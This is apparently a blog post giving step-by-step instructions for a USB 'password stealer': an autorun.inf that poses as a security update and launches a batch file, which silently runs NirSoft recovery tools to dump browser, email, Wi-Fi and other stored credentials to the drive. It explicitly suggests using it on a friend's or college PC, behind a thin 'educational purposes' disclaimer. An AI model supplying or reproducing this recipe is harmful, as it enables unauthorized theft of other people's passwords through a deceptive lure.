Hack the Cyb3rV3rs3

How can I create a virus to steal passwords ?

Rohit Chaudhary
3 min readOct 14, 2023

--

Hello everyone! 👋😄 Today, I’ll show you how to make a 💻 virus that will steal passwords from a PC.

🚨 NOTE: This blog is only meant for educational purposes. 📚👨‍🏫

“Hello Hackcyberverse community! Today, we’ve got a new post for you where we’re diving into a discussion about online security. Specifically, we’ll be exploring how to protect your own passwords and personal information on a Windows PC. You see, Windows tends to remember a lot of passwords we use regularly, from email to various online services. It even stores passwords for applications like Outlook Express, SMTP, POP, FTP, and the autofill data from popular browsers like Chrome and Firefox.

It’s worth noting that there are various tools available for retrieving these stored passwords. By using these tools and a simple USB pen drive, we can demonstrate how someone could potentially gain unauthorized access to a friend’s computer. Now, think about the implications of this on a college PC — quite a thrilling concept, right? So, let’s dive into the details and explore this topic further…”

Open notepad and type the following code:

[autorun]

open=update.bat

ACTION= IMPORTANT: Install security updates

Now save this notepad file and name it “autorun.inf”. Make sure about the extension. It must be changed. Now we will make the “update.bat” file.

Open a new notepad and type the following code:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt

Now save this notepad file as update.bat

In the last step, head over to the website http://www.nirsoft.net and acquire all the necessary files we’ve mentioned in the update.bat code. Make sure these files are in .exe format. Once you’ve gathered all these files, it’s time to create your toolkit.

Copy the “autorun.inf” file, “update.bat,” and the .exe files onto a USB flash drive. This will become your toolkit.

Now, insert the USB drive into the target PC. Thanks to the autorun.inf file we created, an autorun window will appear, displaying the message we wrote. You can customize this message as needed. Once the autorun window appears, all the password-stealing tools will quietly run in the background. This process usually takes just a few seconds. The stolen passwords are stored in .txt files. When it’s finished, simply remove the USB drive, and you’re done.

To access the stolen passwords, go to “My Computer” and navigate to your USB drive. Inside, you’ll find several text files. Opening these files will reveal the stolen usernames and passwords.

Please be aware that this method might not work with certain antivirus software, like K7, as they may remove the .inf file. Best of luck with your endeavors, but remember to always use your skills responsibly and ethically.

--

--

Rohit Chaudhary
Rohit Chaudhary

No responses yet